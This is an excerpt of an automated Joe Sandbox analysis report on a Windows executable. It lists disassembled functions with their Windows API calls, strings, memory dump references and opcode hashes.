                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: ChildEnumWindows
                    • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                    • API String ID: 3555792229-1603158881
                    • Opcode ID: ec1b2c5ef55112558705b1f2f9e35d7e0ecf4ffddfa086fd6d13dd20cc331da8
                    • Instruction ID: 7454df241f77d0b93e78cd2df6a08ba454d4c5e8e9c0a671585cc9aba64ec447
                    • Opcode Fuzzy Hash: ec1b2c5ef55112558705b1f2f9e35d7e0ecf4ffddfa086fd6d13dd20cc331da8
                    • Instruction Fuzzy Hash: BA91BB70600505AADB08DF61C452BEEF774BF04305F54822FEC59A7242DB3969ADCB99
                    Function 00402E26 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 186windowCOMMON
                    Download Yara Rule
                    APIs
                    • SetWindowLongW.USER32(?,000000EB), ref: 00402EAE
                      • Part of subcall function 00401DB3: GetClientRect.USER32(?,?), ref: 00401DDC
                      • Part of subcall function 00401DB3: GetWindowRect.USER32(?,?), ref: 00401E1D
                      • Part of subcall function 00401DB3: ScreenToClient.USER32(?,?), ref: 00401E45
                    • GetDC.USER32 ref: 0043CD32
                    • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0043CD45
                    • SelectObject.GDI32(00000000,00000000), ref: 0043CD53
                    • SelectObject.GDI32(00000000,00000000), ref: 0043CD68
                    • ReleaseDC.USER32(?,00000000), ref: 0043CD70
                    • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 0043CDFB
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                    • String ID: U
                    • API String ID: 4009187628-3372436214
                    • Opcode ID: 3cdb49cb97ee06b786ec44539fc98b371f27cf3cd913876941f0ba4c68568fc2
                    • Instruction ID: a06c30b2c7428a2a0e02ce49fef1101dc5652c1e0a779c9989b3b0b616dc9c80
                    • Opcode Fuzzy Hash: 3cdb49cb97ee06b786ec44539fc98b371f27cf3cd913876941f0ba4c68568fc2
                    • Instruction Fuzzy Hash: 8A71CB31400205DFCF219F64C884AAB3BB5FF48324F14567BFD55AA2A6C7389881DBA9
                    Function 00478C46 Relevance: 13.9, APIs: 9, Instructions: 438COMMON
                    Download Yara Rule
                    APIs
                    • GetModuleFileNameW.KERNEL32(?,?,00000104,?,0048F910), ref: 00478D28
                    • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,0048F910), ref: 00478D5C
                    • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00478ED6
                    • SysFreeString.OLEAUT32(?), ref: 00478F00
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: Free$FileLibraryModuleNamePathQueryStringType
                    • String ID:
                    • API String ID: 560350794-0
                    • Opcode ID: e599abc5ccc1fcc2afa0811a74523479773a4e2d78cc03c258ebc6d435cce25a
                    • Instruction ID: 5de9ffb64ca5e15a2b50b30bc9937a924b2564530b5861c8322637ebb6f06415
                    • Opcode Fuzzy Hash: e599abc5ccc1fcc2afa0811a74523479773a4e2d78cc03c258ebc6d435cce25a
                    • Instruction Fuzzy Hash: A4F12871A00109AFCB14DF94C888EEEB7B9FF49314F10846AF909AB251DB35AE46CB55
                    Function 0047F694 Relevance: 13.9, APIs: 9, Instructions: 386processCOMMON
                    Download Yara Rule
                    APIs
                    • _memset.LIBCMT ref: 0047F6B5
                    • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0047F848
                    • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0047F86C
                    • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0047F8AC
                    • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0047F8CE
                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0047FA4A
                    • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 0047FA7C
                    • CloseHandle.KERNEL32(?), ref: 0047FAAB
                    • CloseHandle.KERNEL32(?), ref: 0047FB22
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                    • String ID:
                    • API String ID: 4090791747-0
                    • Opcode ID: 672ed7388afacd0d872fab5b0b0eb3ddfdca08b89d017b8929350983388c545e
                    • Instruction ID: 06b6fb47819207378a011b81351d7d70f99dbcb89b467e7706fbe8a6ff9703be
                    • Opcode Fuzzy Hash: 672ed7388afacd0d872fab5b0b0eb3ddfdca08b89d017b8929350983388c545e
                    • Instruction Fuzzy Hash: D8E194716042009FC714EF25C451BAA7BE1BF85314F14856EF8999B3A2DB38EC49CB5A
                    Function 00464CC1 Relevance: 13.7, APIs: 9, Instructions: 170filestringCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 0046466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00463697,?), ref: 0046468B
                      • Part of subcall function 0046466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00463697,?), ref: 004646A4
                      • Part of subcall function 00464A31: GetFileAttributesW.KERNEL32(?,0046370B), ref: 00464A32
                    • lstrcmpiW.KERNEL32(?,?), ref: 00464D40
                    • _wcscmp.LIBCMT ref: 00464D5A
                    • MoveFileW.KERNEL32(?,?), ref: 00464D75
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                    • String ID:
                    • API String ID: 793581249-0
                    • Opcode ID: e5efdc4b7bed8b35d3c7756aed83619e761acd6f8ed92700794926c6f689935b
                    • Instruction ID: 3e0d64ecfe06201b2d7f4e4ce82b19db3d94e317acadfd9fd6841a38a6d3c077
                    • Opcode Fuzzy Hash: e5efdc4b7bed8b35d3c7756aed83619e761acd6f8ed92700794926c6f689935b
                    • Instruction Fuzzy Hash: 1D5164B25083459BCB24EFA1D8819DF73ECAF84354F40092FB289D3151EE79A589C76B
                    Function 00488645 Relevance: 13.7, APIs: 9, Instructions: 168COMMON
                    Download Yara Rule
                    APIs
                    • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 004886FF
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: InvalidateRect
                    • String ID:
                    • API String ID: 634782764-0
                    • Opcode ID: 9e4666c3df532daa50fe19b6785993d851fb0bba6d5b1ec7531c4121b57b79da
                    • Instruction ID: 67c69bdd2abc2e43d0d58bc2ecba6baab6695951e18c15bee5b3ec72a7eaee37
                    • Opcode Fuzzy Hash: 9e4666c3df532daa50fe19b6785993d851fb0bba6d5b1ec7531c4121b57b79da
                    • Instruction Fuzzy Hash: BE519530500244BEDB20BB298C89F5E7B64EB05724FA0492FF911E62E1DF79A990DB5D
                    Function 00402B72 Relevance: 13.7, APIs: 9, Instructions: 161windowCOMMON
                    Download Yara Rule
                    APIs
                    • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 0043C2F7
                    • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0043C319
                    • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 0043C331
                    • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 0043C34F
                    • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 0043C370
                    • DestroyIcon.USER32(00000000), ref: 0043C37F
                    • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0043C39C
                    • DestroyIcon.USER32(?), ref: 0043C3AB
                      • Part of subcall function 0048A4AF: DeleteObject.GDI32(00000000), ref: 0048A4E8
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
                    • String ID:
                    • API String ID: 2819616528-0
                    • Opcode ID: 30831d3652e0c4a0d09569093ab55e826fc0c5f0f59ece252e466e99477c3991
                    • Instruction ID: 8b5e312d24aa0fc7293d55633b028b71e285ae3fa30838bdc618f7a4141ee9b3
                    • Opcode Fuzzy Hash: 30831d3652e0c4a0d09569093ab55e826fc0c5f0f59ece252e466e99477c3991
                    • Instruction Fuzzy Hash: 9D516A74A00205AFDB20DF65CD85FAF3BB5EB58310F10452EF902A72D0D7B4A991DB68
                    Function 0045966E Relevance: 13.6, APIs: 9, Instructions: 66sleepkeyboardwindowCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 0045A82C: GetWindowThreadProcessId.USER32(?,00000000), ref: 0045A84C
                      • Part of subcall function 0045A82C: GetCurrentThreadId.KERNEL32 ref: 0045A853
                      • Part of subcall function 0045A82C: AttachThreadInput.USER32(00000000,?,00459683,?,00000001), ref: 0045A85A
                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 0045968E
                    • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 004596AB
                    • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 004596AE
                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 004596B7
                    • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 004596D5
                    • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 004596D8
                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 004596E1
                    • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 004596F8
                    • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 004596FB
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                    • String ID:
                    • API String ID: 2014098862-0
                    • Opcode ID: 97659e6d0eeaf490ac976d3d5fe311f7ccd298156506907ffd454ad2a564656a
                    • Instruction ID: 1862abde6b5ba1d27f2b77b23e96e8fddf5d6721de8ccd0207d4cd72f070cce3
                    • Opcode Fuzzy Hash: 97659e6d0eeaf490ac976d3d5fe311f7ccd298156506907ffd454ad2a564656a
                    • Instruction Fuzzy Hash: F011E571910618BEF6106F61DC49F6E3B1DDB4C755F100939F644AB0A1CAF25C15DBA8
                    Function 00458921 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON
                    Download Yara Rule
                    APIs
                    • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,0045853C,00000B00,?,?), ref: 0045892A
                    • HeapAlloc.KERNEL32(00000000,?,0045853C,00000B00,?,?), ref: 00458931
                    • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,0045853C,00000B00,?,?), ref: 00458946
                    • GetCurrentProcess.KERNEL32(?,00000000,?,0045853C,00000B00,?,?), ref: 0045894E
                    • DuplicateHandle.KERNEL32(00000000,?,0045853C,00000B00,?,?), ref: 00458951
                    • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,0045853C,00000B00,?,?), ref: 00458961
                    • GetCurrentProcess.KERNEL32(0045853C,00000000,?,0045853C,00000B00,?,?), ref: 00458969
                    • DuplicateHandle.KERNEL32(00000000,?,0045853C,00000B00,?,?), ref: 0045896C
                    • CreateThread.KERNEL32(00000000,00000000,00458992,00000000,00000000,00000000), ref: 00458986
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                    • String ID:
                    • API String ID: 1957940570-0
                    • Opcode ID: 3e7611f068968c6c6daa1a3146ff6b5b84d59536ecce8ca695804ebc6f6fd54c
                    • Instruction ID: 349ed70c1d76ccaf0bdfd0abb61d7988567b7a63eab8a905bd57cb3f4c4245c0
                    • Opcode Fuzzy Hash: 3e7611f068968c6c6daa1a3146ff6b5b84d59536ecce8ca695804ebc6f6fd54c
                    • Instruction Fuzzy Hash: 4801BBB5240308FFE710ABA5DC8DF6B7BACEB89711F508825FA05DB1A1CA759C14CB24
                    Function 0047975D Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 242COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 0045710A: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00457044,80070057,?,?,?,00457455), ref: 00457127
                      • Part of subcall function 0045710A: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00457044,80070057,?,?), ref: 00457142
                      • Part of subcall function 0045710A: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00457044,80070057,?,?), ref: 00457150
                      • Part of subcall function 0045710A: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00457044,80070057,?), ref: 00457160
                    • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 00479806
                    • _memset.LIBCMT ref: 00479813
                    • _memset.LIBCMT ref: 00479956
                    • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 00479982
                    • CoTaskMemFree.OLE32(?), ref: 0047998D
                    Strings
                    • NULL Pointer assignment, xrefs: 004799DB
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                    • String ID: NULL Pointer assignment
                    • API String ID: 1300414916-2785691316
                    • Opcode ID: fbe0dc1f19d72217c84f4e03ce11a64488ab95a0392ce253f7bf026771c08858
                    • Instruction ID: 344d97a8cecc5579365d94fc52d7d4a9bdae2fe77cb17e56d270d326fab8ac0d
                    • Opcode Fuzzy Hash: fbe0dc1f19d72217c84f4e03ce11a64488ab95a0392ce253f7bf026771c08858
                    • Instruction Fuzzy Hash: BD915CB1D00218EBDB10DFA5DC81EDEBBB9EF08314F10806AF519A7291EB755A44CFA5
                    Function 00486D80 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 143windowCOMMON
                    Download Yara Rule
                    APIs
                    • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00486E24
                    • SendMessageW.USER32(?,00001036,00000000,?), ref: 00486E38
                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00486E52
                    • _wcscat.LIBCMT ref: 00486EAD
                    • SendMessageW.USER32(?,00001057,00000000,?), ref: 00486EC4
                    • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00486EF2
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: MessageSend$Window_wcscat
                    • String ID: SysListView32
                    • API String ID: 307300125-78025650
                    • Opcode ID: 16f1706c89c53c521989aa15edd3457245b1a700a2ad8cceaac67dbb77529257
                    • Instruction ID: cb01a20e413fb831c79b84d4e1a22deaf7a16da1e784ee9815b65cba95e2bd2f
                    • Opcode Fuzzy Hash: 16f1706c89c53c521989aa15edd3457245b1a700a2ad8cceaac67dbb77529257
                    • Instruction Fuzzy Hash: 6341A370A00308ABDB21AF64CC85BEF77F8EF08354F11082BF544A7291D6799D858B68
                    Function 0047E933 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00463C55: CreateToolhelp32Snapshot.KERNEL32 ref: 00463C7A
                      • Part of subcall function 00463C55: Process32FirstW.KERNEL32(00000000,?), ref: 00463C88
                      • Part of subcall function 00463C55: CloseHandle.KERNEL32(00000000), ref: 00463D52
                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0047E9A4
                    • GetLastError.KERNEL32 ref: 0047E9B7
                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0047E9E6
                    • TerminateProcess.KERNEL32(00000000,00000000), ref: 0047EA63
                    • GetLastError.KERNEL32(00000000), ref: 0047EA6E
                    • CloseHandle.KERNEL32(00000000), ref: 0047EAA3
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                    • String ID: SeDebugPrivilege
                    • API String ID: 2533919879-2896544425
                    • Opcode ID: 1fbe102fe1978df8388a2962b1b00d0cd5216d5acde680508b8c4a8fc22a507b
                    • Instruction ID: ee7027a858fb35c2998370541a0cb7821fbd3e1ab4d9769570fd7f32c35e06b7
                    • Opcode Fuzzy Hash: 1fbe102fe1978df8388a2962b1b00d0cd5216d5acde680508b8c4a8fc22a507b
                    • Instruction Fuzzy Hash: E1419D712002009FDB10EF25DC95BAEB7A5AF44318F04856EF9069B3C2DB78AC09CB99
                    Function 00462F94 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 82windowCOMMON
                    Download Yara Rule
                    APIs
                    • LoadIconW.USER32(00000000,00007F03), ref: 00463033
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: IconLoad
                    • String ID: blank$info$question$stop$warning
                    • API String ID: 2457776203-404129466
                    • Opcode ID: 55f9dc3ea46c5c896c834eceb9773494ed516fdc9e05eb433b65141dcb2bff31
                    • Instruction ID: 1734436af2ca56e59899cd3bdf017f39c547290e8d4403808a282f24c331c6a5
                    • Opcode Fuzzy Hash: 55f9dc3ea46c5c896c834eceb9773494ed516fdc9e05eb433b65141dcb2bff31
                    • Instruction Fuzzy Hash: F211F631348386BAE7249E55DC42DAF679C9F15365B20002FF90066281FAFC5E4956AE
